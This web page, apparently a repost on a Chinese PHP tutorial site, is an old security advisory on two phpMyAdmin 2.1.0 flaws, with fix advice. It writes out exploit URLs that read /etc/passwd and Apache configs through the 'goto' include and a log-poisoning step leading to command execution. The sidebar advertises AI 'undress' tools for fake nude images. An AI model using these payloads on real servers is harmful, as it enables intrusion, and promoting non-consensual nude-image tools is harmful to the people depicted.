社群
學習
工具庫
AI工具
休閒
搜尋
繁体中文
首頁 php教程 php手册 phpMyAdmin2.1.0存在两个漏洞

phpMyAdmin2.1.0存在两个漏洞

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
Jun 13, 2016 am 10:11 AM
http p phpmyadmin 存在 漏洞

phpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) 是一款管理 MySQL 数据库的 PHP 工具,具有基于 WEB 的界面。但是发现它存在漏洞。可选择安装新发布稳定版本:
phpMyAdmin 2.2.0。
1、目录遍历漏洞
攻击者通过提供如下的 URL:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*)
http://www.example.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd
能非法访问系统文件
有问题的代码在:
‘include($goto);‘ in sql.php and in tbl_replace.php.
2、执行攻击者代码漏洞
通过使用全局可写日志文件,攻击者能在受影响服务器上执行任意代码。
首先,得到 Apache 配置文件以便知道日志文件存储位置:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/access.conf&btnDrop=No
可以看出,日志放在:
/var/log/httpd/error_log
/var/log/httpd/access_log
然后 telnet 到 端口80
# telnet www.example.com 80
Trying xxx.xxx.xxx.xxx...
Connected to www.example.com.
Escape character is ‘^]‘.
GET
^]
telnet> quit
Connection closed.
#
在 GET 请求之后,攻击者能将任意 PHP 代码上传
现在,可以用 Apache 用户身份远程运行命令了:
http://www.example.com/phpMyAdmin/sql.php?goto=/var/log/httpd/
access_log&btnDrop=No?meters=ls%20-l%20/
受影响系统:
phpMyAdmin 2.1.0
解决方案:
建议:
1.使用 phpMyAdmin 2.2.0
http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.2.0-php.tar.gz
2.用户下载安装补丁:
http://www.securereality.com.au/patches/phpMyAdmin-SecureReality.diff
摘自:52w.net

本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

Video Face Swap

Video Face Swap

使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!

顯示更多

熱門文章

Windows 11 KB5054979中的新功能以及如何解決更新問題
4 週前 By DDD
如何修復KB5055523無法在Windows 11中安裝?
3 週前 By DDD
Inzoi:如何申請學校和大學
1 個月前 By DDD
如何修復KB5055518無法在Windows 10中安裝?
3 週前 By DDD
在哪裡可以找到Atomfall中的站點辦公室鑰匙
4 週前 By DDD
顯示更多

熱工具

記事本++7.3.1

記事本++7.3.1

好用且免費的程式碼編輯器

SublimeText3漢化版

SublimeText3漢化版

中文版,非常好用

禪工作室 13.0.1

禪工作室 13.0.1

強大的PHP整合開發環境

Dreamweaver CS6

Dreamweaver CS6

視覺化網頁開發工具

SublimeText3 Mac版

SublimeText3 Mac版

神級程式碼編輯軟體(SublimeText3)

顯示更多

熱門話題

gmail信箱登陸入口在哪裡
7887
15
Java教學
1649
14
CakePHP 教程
1410
52
Laravel 教程
1301
25
PHP教程
1246
29
顯示更多
Related knowledge
phpmyadmin怎麼設定主鍵 phpmyadmin怎麼設定主鍵 Apr 07, 2024 pm 02:54 PM

表的主鍵是一列或多列,用於唯一識別表中每筆記錄。設定主鍵的步驟如下:登入 phpMyAdmin。選擇資料庫和表格。勾選要作為主鍵的列。點選 "儲存變更"。主鍵具有資料完整性、查找速度和關係建模方面的好處。

phpmyadmin怎麼加入外鍵 phpmyadmin怎麼加入外鍵 Apr 07, 2024 pm 02:36 PM

在 phpMyAdmin 中新增外鍵可以透過以下步驟實現:選擇包含外鍵的父表。編輯父表結構,在「列」中新增列。啟用外鍵約束,選擇引用表和鍵。設定更新/刪除操作。儲存更改。

wordpress的資料庫存在什麼地方 wordpress的資料庫存在什麼地方 Apr 15, 2024 pm 10:39 PM

WordPress 資料庫位於 MySQL 資料庫中,儲存所有網站數據,可以透過託管提供者的儀表板、FTP 或 phpMyAdmin 存取。資料庫名稱與網站 URL 或使用者名稱相關,存取需要使用資料庫憑證,包括名稱、使用者名稱、密碼和主機名,這些憑證通常儲存在「wp-config.php」檔案中。

phpmyadmin怎麼刪除資料表 phpmyadmin怎麼刪除資料表 Apr 07, 2024 pm 03:00 PM

phpMyAdmin 中刪除資料表的步驟:選擇資料庫和資料表;點選「操作」標籤;選擇「刪除」選項;確認並執行刪除操作。

phpmyadmin漏洞屬於什麼漏洞 phpmyadmin漏洞屬於什麼漏洞 Apr 07, 2024 pm 01:36 PM

phpMyAdmin 容易受到多種漏洞影響,包括:1. SQL 注入漏洞;2. 跨站點腳本(XSS) 漏洞;3. 遠端程式碼執行(RCE) 漏洞;4. 本地檔案包含(LFI) 漏洞;5. 資訊外洩漏洞;6. 權限提升漏洞。

navicat連線不上怎麼辦 navicat連線不上怎麼辦 Apr 23, 2024 am 10:00 AM

出現 Navicat 無法連線問題時,可依序嘗試以下解決方法:檢查連線資訊是否正確,例如資料庫名稱、主機名稱、連接埠號碼、使用者名稱和密碼。確保資料庫已啟動並正在運行。檢查防火牆規則,確認 Navicat 和相關服務沒有被封鎖。嘗試使用 ping 指令測試網路連線。更新 Navicat 用戶端軟體至最新版本。檢查伺服器日誌,尋找與連線失敗相關的錯誤訊息。嘗試使用其他資料庫工具連接,以排除 Navicat 特定的問題。

phpmyadmin怎麼匯出excel phpmyadmin怎麼匯出excel Apr 07, 2024 pm 02:24 PM

透過 phpMyAdmin 匯出資料到 Excel 格式:登入 phpMyAdmin 後,選擇要匯出的資料庫和表格。點選「匯出」選項,在「格式」下拉式選單中選擇「Excel」。自行選擇匯出列、查詢選項和其它匯出選項。點擊「轉儲」按鈕開始匯出,並下載匯出的 Excel 檔案。

phpmyadmin外鍵怎麼設定 phpmyadmin外鍵怎麼設定 Apr 07, 2024 pm 03:03 PM

如何設定外鍵?建立主表和子表。打開 phpMyAdmin 儀表板。選擇主表。開啟“結構”標籤。新增外鍵列,並選擇子表中的關聯列。選擇外鍵類型(如“CASCADE”)。儲存更改。

See all articles